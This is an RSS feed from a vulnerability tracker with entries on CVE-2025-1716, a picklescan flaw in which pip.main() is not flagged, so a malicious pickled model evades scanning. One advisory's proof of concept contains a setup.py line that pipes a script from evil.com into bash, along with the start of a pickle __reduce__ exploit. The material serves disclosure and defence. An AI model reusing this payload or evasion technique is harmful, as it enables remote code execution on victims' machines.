<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 10 Oct 2026 16:10:44 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-264500</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-264500</link>
      <description>EUVD-2026-264500</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-264500</guid>
    </item>
    <item>
      <title>fkie_cve-2025-1716</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2025-1716</link>
      <description>&lt;p&gt;picklescan before 0.0.21 does not treat &amp;#39;pip&amp;#39; as an unsafe global. An attacker could craft a malicious model that uses Pickle to pull in a malicious PyPI package (hosted, for example, on pypi.org or GitHub) via `pip.main()`. Because pip is not a restricted global, the model, when scanned with picklescan, would pass security checks and appear to be safe, when it could instead prove to be problematic.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;picklescan before 0.0.21 does not treat &amp;#39;pip&amp;#39; as an unsafe global. An attacker could craft a malicious model that uses Pickle to pull in a malicious PyPI package (hosted, for example, on pypi.org or GitHub) via `pip.main()`. Because pip is not a restricted global, the model, when scanned with picklescan, would pass security checks and appear to be safe, when it could instead prove to be problematic.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2025-1716</guid>
    </item>
    <item>
      <title>GHSA-655q-fx9r-782v — Picklescan Allows Remote Code Execution via Malicious Pickle File Bypassing Static Analysis</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-655q-fx9r-782v</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;### CVE-2025-1716&lt;/p&gt;
&lt;p&gt;### Summary
An unsafe deserialization vulnerability in Python’s pickle module allows an attacker to bypass static analysis tools like Picklescan and execute arbitrary code during deserialization. This can be exploited to run pip install and fetch a malicious package, enabling remote code execution (RCE) upon package installation.&lt;/p&gt;
&lt;p&gt;### Details
Pickle’s deserialization process allows execution of arbitrary functions via the __reduce__ method. While Picklescan is designed to detect such exploits, this attack evades detection by leveraging pip.main() as the callable function. Since pip is a legitimate package operation, it may not raise red flags in security scans.&lt;/p&gt;
&lt;p&gt;The payload executes the following steps:&lt;/p&gt;
&lt;p&gt;1. During unpickling, it calls pip.main() to install a malicious PyPI package.
2. The installed package runs arbitrary code via setup.py, entry_points, or post-install hooks.
3. Execution is silent, with minimal logging to avoid detection.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;Step 1: Create the Malicious Package
Host a PyPI package with a malicious setup.py or entry_point.&lt;/p&gt;
&lt;p&gt;Example malicious `setup.py`
```
from setuptools import setup
import os&lt;/p&gt;
&lt;p&gt;os.system(&amp;#34;curl -s https://evil.com/payload.sh | bash&amp;#34;)  # Executes remote shell script&lt;/p&gt;
&lt;p&gt;setup(
    name=&amp;#34;rsac-demo-package&amp;#34;,
    version=&amp;#34;0.1&amp;#34;,
    packages=[&amp;#34;rsac_demo&amp;#34;],
    install_requires=[],
)
```
Upload it to PyPI or host on GitHub.&lt;/p&gt;
&lt;p&gt;Step 2: Exploit via Pickle
```
import pickle
import pip&lt;/p&gt;
&lt;p&gt;class Exploit:
    def __reduce__(self):…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;### CVE-2025-1716&lt;/p&gt;
&lt;p&gt;### Summary
An unsafe deserialization vulnerability in Python’s pickle module allows an attacker to bypass static analysis tools like Picklescan and execute arbitrary code during deserialization. This can be exploited to run pip install and fetch a malicious package, enabling remote code execution (RCE) upon package installation.&lt;/p&gt;
&lt;p&gt;### Details
Pickle’s deserialization process allows execution of arbitrary functions via the __reduce__ method. While Picklescan is designed to detect such exploits, this attack evades detection by leveraging pip.main() as the callable function. Since pip is a legitimate package operation, it may not raise red flags in security scans.&lt;/p&gt;
&lt;p&gt;The payload executes the following steps:&lt;/p&gt;
&lt;p&gt;1. During unpickling, it calls pip.main() to install a malicious PyPI package.
2. The installed package runs arbitrary code via setup.py, entry_points, or post-install hooks.
3. Execution is silent, with minimal logging to avoid detection.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;Step 1: Create the Malicious Package
Host a PyPI package with a malicious setup.py or entry_point.&lt;/p&gt;
&lt;p&gt;Example malicious `setup.py`
```
from setuptools import setup
import os&lt;/p&gt;
&lt;p&gt;os.system(&amp;#34;curl -s https://evil.com/payload.sh | bash&amp;#34;)  # Executes remote shell script&lt;/p&gt;
&lt;p&gt;setup(
    name=&amp;#34;rsac-demo-package&amp;#34;,
    version=&amp;#34;0.1&amp;#34;,
    packages=[&amp;#34;rsac_demo&amp;#34;],
    install_requires=[],
)
```
Upload it to PyPI or host on GitHub.&lt;/p&gt;
&lt;p&gt;Step 2: Exploit via Pickle
```
import pickle
import pip&lt;/p&gt;
&lt;p&gt;class Exploit:
    def __reduce__(self):…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-655q-fx9r-782v</guid>
    </item>
    <item>
      <title>PYSEC-2025-18</title>
      <link>https://cve.radiocsirt.org/vuln/pysec-2025-18</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;picklescan before 0.0.21 does not treat &amp;#39;pip&amp;#39; as an unsafe global. An attacker could craft a malicious model that uses Pickle to pull in a malicious PyPI package (hosted, for example, on pypi.org or GitHub) via `pip.main()`. Because pip is not a restricted global, the model, when scanned with picklescan, would pass security checks and appear to be safe, when it could instead prove to be problematic.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;picklescan before 0.0.21 does not treat &amp;#39;pip&amp;#39; as an unsafe global. An attacker could craft a malicious model that uses Pickle to pull in a malicious PyPI package (hosted, for example, on pypi.org or GitHub) via `pip.main()`. Because pip is not a restricted global, the model, when scanned with picklescan, would pass security checks and appear to be safe, when it could instead prove to be problematic.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/pysec-2025-18</guid>
    </item>
  </channel>
</rss>
